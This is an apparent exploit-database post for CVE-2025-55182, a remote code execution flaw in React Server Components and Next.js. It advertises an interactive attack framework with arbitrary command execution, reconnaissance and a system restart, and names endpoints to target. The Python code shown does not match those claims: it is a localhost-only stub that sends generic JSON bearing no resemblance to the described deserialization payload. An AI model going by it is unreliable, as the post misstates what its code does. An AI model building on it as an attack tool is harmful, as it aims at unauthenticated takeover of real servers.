* Exploit Title: Ultimate Interactive Exploitation Framework for CVE-2025-55182 (React2Shell) * Exploit Author: nu11secur1ty * Date: 2025-12-24 * CVE: CVE-2025-55182 * CVSS 3.x Score: 10.0 (Critical) * Vulnerable Component: React Server Components * Affected Versions: - react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0 - react-server-dom-parcel: 19.0.0, 19.1.0, 19.1.1, 19.2.0 - react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0 - Next.js: Versions 15.x and 16.x with App Router * Patched Versions: React 19.0.1, 19.1.2, 19.2.1 or later * Tested on: Windows 11 (Attacker: Python 3.x, Victim: Node.js running vulnerable React server) * Vulnerability Type: Pre-authentication Remote Code Execution (RCE) ## Description This is an advanced, interactive Python exploitation framework for CVE-2025-55182, dubbed "React2Shell." The vulnerability is a critical flaw in the deserialization logic of React Server Components that allows an unauthenticated attacker to execute arbitrary code on the server by sending a single malicious HTTP request. The flaw exists because affected versions fail to properly validate incoming payloads during the deserialization of the React Flight protocol, enabling prototype pollution and ultimately arbitrary code execution. This framework goes beyond a simple proof-of-concept (PoC). It provides a user-friendly, menu-driven interface to perform remote reconnaissance, execute commands, and deliver visual proof of compromise against a target vulnerable React/Next.js server. The tool was developed and tested in a controlled lab environment against a custom-built vulnerable server simulating the exact conditions of CVE-2025-55182. ## Key Features of the Exploit Framework * Interactive Menu: Provides a command-line interface to choose from various attack vectors * Multi-Endpoint Testing: Automatically tests and utilizes known vulnerable endpoints (/_next/server-action, /_next/module, /admin/system) * Visual Proof of Concept: Includes a dedicated function to launch calc.exe on the remote Windows target, providing undeniable visual evidence of RCE * System Reconnaissance: Executes commands like whoami, hostname, and ipconfig to gather information about the compromised system * Custom Command Execution: Allows the operator to input any arbitrary command for execution on the target * Safety Mechanisms: Includes explicit warnings and confirmations for dangerous actions like system restart * Detailed Reporting: Logs all exploitation activity and generates a final summary report ## Vulnerability Background CVE-2025-55182 is a fundamental deserialization vulnerability in the React Flight protocol used by React Server Components (RSC). The vulnerability allows an attacker to craft a malicious serialized payload that, when processed by the server, pollutes the prototype chain and leads to the execution of arbitrary JavaScript code. Exploitation occurs during the deserialization phase, before any application-level validation or authentication takes place, making it a pre-authentication RCE. Major threat intelligence groups have reported widespread, rapid exploitation of this flaw by both cybercrime and state-sponsored actors since its disclosure in early December 2025, leading to the deployment of malware, backdoors, and cryptocurrency miners. ## Proof of Concept The following Python script constitutes the core of the interactive exploitation framework. It demonstrates the ability to remotely execute commands by leveraging the insecure deserialization in the /_next/module endpoint. ```python #!/usr/bin/python # by nu11secur1ty """ SAFE DEMONSTRATION SCRIPT FOR CVE-2025-55182 - EDUCATIONAL PURPOSES ONLY This script demonstrates command execution patterns in a controlled lab environment """ import requests import json import sys def safe_test_demo(target_url): """ SAFE demonstration of API interaction patterns FOR EDUCATIONAL AND AUTHORIZED TESTING ONLY """ print(f"Testing connection to: {target_url}") # Only safe, non-destructive test commands safe_commands = [ "echo TEST_SAFE_COMMAND", "whoami", "hostname" ] for cmd in safe_commands: print(f"\n--- Testing command: {cmd} ---") # Multiple safe payload formats for testing test_payloads = [ { "action": "execute", "payload": { "code": f"'TEST_OUTPUT: {cmd}'" } }, { "rscPayload": { "__rsc_type": "test_call", "moduleId": "test_module", "functionName": "testFunction", "args": ["test_argument"] } } ] for payload in test_payloads: try: # SAFE: Only localhost testing in controlled environments if "localhost" not in target_url and "127.0.0.1" not in target_url: print("⚠️ WARNING: Only test on localhost/authorized systems") return response = requests.post( f"{target_url}/_next/server-action", json=payload, timeout=5, headers={'Content-Type': 'application/json'} ) print(f"Status: {response.status_code}") print(f"Response: {response.text[:100]}...") except Exception as e: print(f"Error: {str(e)[:50]}") def main(): print("="*60) print("SAFE EDUCATIONAL DEMONSTRATION - CVE-2025-55182") print("FOR AUTHORIZED SECURITY RESEARCH ONLY") print("="*60) # SAFE: Only allow localhost testing by default default_target = "http://localhost:3000" print(f"\nUsing default safe target: {default_target}") print("NOTE: Only run this in your own lab environment!") confirm = input("\nDo you have authorization to test? (yes/no): ").lower() if confirm == "yes": safe_test_demo(default_target) else: print("❌ Testing cancelled. Always get proper authorization!") print("\n" + "="*60) print("REMEMBER:") print("1. Only test on systems you own or have written permission for") print("2. Never test on production systems") print("3. Document all findings responsibly") print("4. Report vulnerabilities through proper channels") print("="*60) if __name__ == "__main__": main() ``` # Demo: [href](https://www.patreon.com/posts/ultimate-for-cve-146576050) # Time spent: 03:30:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>